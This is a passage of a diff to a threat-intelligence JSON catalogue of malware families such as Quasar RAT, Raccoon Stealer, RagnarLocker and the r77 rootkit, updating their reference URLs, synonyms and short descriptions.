+ "https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/",
+ "https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
+ "https://twitter.com/malwrhunterteam/status/789153556255342596",
+ "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage",
+ "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
+ "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html",
+ "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.antiy.cn/research/notice&report/research_report/20201228.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/",
+ "https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat",
"https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934",
- "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848",
- "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
- "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/",
- "https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://blog.malwarelab.pl/posts/venom/",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments",
- "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
- "https://intel471.com/blog/privateloader-malware",
- "https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
- "https://twitter.com/malwrhunterteam/status/789153556255342596",
- "https://asec.ahnlab.com/en/31089/",
- "https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
- "https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ",
- "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage",
- "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
"https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf",
+ "https://blog.minerva-labs.com/trapping-quasar-rat",
+ "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
+ "https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/",
+ "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass",
+ "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques",
+ "https://blog.malwarelab.pl/posts/venom/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ",
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments",
+ "https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://twitter.com/struppigel/status/1130455143504318466",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
@@ -37740,6 +39754,23 @@
"uuid": "56d5ee92-845e-4b71-814c-2b0f0ca88523",
"value": "QUICKMUTE"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quietcanary",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity"
+ ],
+ "synonyms": [
+ "Kapushka",
+ "Tunnus"
+ ],
+ "type": []
+ },
+ "uuid": "2577fb8d-1511-49f7-9b62-7816137190c8",
+ "value": "QUIETCANARY"
+ },
{
"description": "According to Microsoft, this is a heavily obfuscated .NET malware, primarily geared towards the exfiltration of data from the compromised host. But it can also receive and execute a remote payload from the operator.",
"meta": {
@@ -37781,6 +39812,22 @@
"uuid": "020950da-79e5-481b-9986-14ed1c97e04c",
"value": "QvoidStealer"
},
+ {
+ "description": "According to the author, r77 is a ring 3 rootkit that hides everything: \r\n* Files, directories\r\n* Processes & CPU usage\r\n* Registry keys & values\r\n* Services\r\n* TCP & UDP connections\r\n* Junctions, named pipes, scheduled tasks",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.r77",
+ "https://github.com/bytecode77/r77-rootkit",
+ "https://twitter.com/malmoeb/status/1523179260273254407"
+ ],
+ "synonyms": [
+ "r77 Rootkit"
+ ],
+ "type": []
+ },
+ "uuid": "f577050b-a4a3-4ebd-a9d9-77300f3435f5",
+ "value": "r77"
+ },
{
"description": "",
"meta": {
@@ -37799,53 +39846,60 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon",
- "https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/",
- "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
- "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/",
- "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer",
- "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/",
- "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/",
- "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
- "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
- "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
- "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
- "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block",
- "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf",
- "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/",
- "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
- "https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/",
- "https://www.group-ib.com/blog/fakesecurity_raccoon",
- "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d",
- "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html",
- "https://www.youtube.com/watch?v=5KHZSmBeMps",
- "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://www.riskiq.com/blog/labs/magecart-medialand/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf",
- "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/",
- "https://www.youtube.com/watch?v=1dbepxN2YD8",
- "https://d01a.github.io/raccoon-stealer/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
- "https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/",
- "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
- "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://asec.ahnlab.com/en/35981/",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://asec.ahnlab.com/ko/25837/",
- "https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram",
- "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949",
"https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/",
+ "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/",
+ "https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/",
+ "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
+ "https://d01a.github.io/raccoon-stealer/",
+ "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/",
+ "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8",
+ "https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram",
+ "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
+ "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html",
+ "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/",
+ "https://asec.ahnlab.com/en/35981/",
+ "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf",
+ "https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/",
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/",
+ "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer",
+ "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block",
+ "https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view",
+ "https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/",
+ "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949",
+ "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/",
+ "https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation",
+ "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/",
"https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d",
- "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/",
+ "https://www.group-ib.com/blog/fakesecurity_raccoon",
+ "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon",
+ "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d",
+ "https://www.riskiq.com/blog/labs/magecart-medialand/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.youtube.com/watch?v=5KHZSmBeMps",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf",
+ "https://www.youtube.com/watch?v=1dbepxN2YD8",
+ "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family"
],
"synonyms": [
"Mohazo",
@@ -37858,6 +39912,20 @@
"uuid": "027fb7d0-3e9b-4433-aee1-c266e165a5cc",
"value": "Raccoon"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "993db92e-0c84-4750-a58f-2b61d6cd6d67",
+ "value": "Racket Downloader"
+ },
{
"description": "",
"meta": {
@@ -37901,51 +39969,52 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/",
- "https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/",
- "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf",
- "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information",
- "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
- "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/",
+ "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://www.acronis.com/en-sg/articles/ragnar-locker/",
+ "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/",
+ "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html",
+ "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
+ "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/",
+ "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html",
+ "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/",
+ "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information",
"https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/",
"https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.ic3.gov/Media/News/2022/220307.pdf",
- "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/",
- "https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/",
- "https://www.acronis.com/en-sg/articles/ragnar-locker/",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/",
+ "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
"http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
"https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/",
- "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "https://www.ic3.gov/Media/News/2022/220307.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
- "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf",
- "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/"
+ "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://securelist.com/targeted-ransomware-encrypting-data/99255/"
],
"synonyms": [],
"type": []
@@ -37958,13 +40027,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok",
- "https://news.sophos.com/en-us/2020/05/21/asnarok2/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw",
"https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/",
+ "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/",
+ "https://news.sophos.com/en-us/2020/05/21/asnarok2/",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
],
"synonyms": [],
@@ -37978,27 +40047,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
- "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://www.youtube.com/watch?v=GfbxHy6xnbA",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
